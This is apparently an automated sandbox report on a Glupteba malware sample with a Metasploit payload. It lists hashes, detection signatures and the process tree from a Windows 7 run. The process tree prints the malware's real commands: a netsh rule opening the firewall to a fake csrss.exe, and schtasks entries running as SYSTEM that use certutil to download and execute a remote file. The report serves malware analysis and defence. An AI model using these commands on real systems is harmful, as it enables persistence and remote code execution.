Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
5s -
max time network
165s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31/12/2023, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
2654d11f2d3ce974e432ad1c84bcd1f7.exe
Resource
win7-20231215-en
General
-
Target
2654d11f2d3ce974e432ad1c84bcd1f7.exe
-
Size
4.5MB
-
MD5
2654d11f2d3ce974e432ad1c84bcd1f7
-
SHA1
053efdc46790dd1b49e93863df59c83c39342c8f
-
SHA256
df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
-
SHA512
8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
-
SSDEEP
98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 18 IoCs
resource yara_rule behavioral1/memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp family_glupteba behavioral1/memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp family_glupteba behavioral1/memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp family_glupteba behavioral1/memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2636 netsh.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2792 schtasks.exe 368 schtasks.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 28 Go-http-client/1.1 HTTP User-Agent header 29 Go-http-client/1.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"1⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"2⤵PID:2848
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:2580
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /51-513⤵PID:2504
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:368
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵PID:2356
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab1⤵PID:2404
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:2636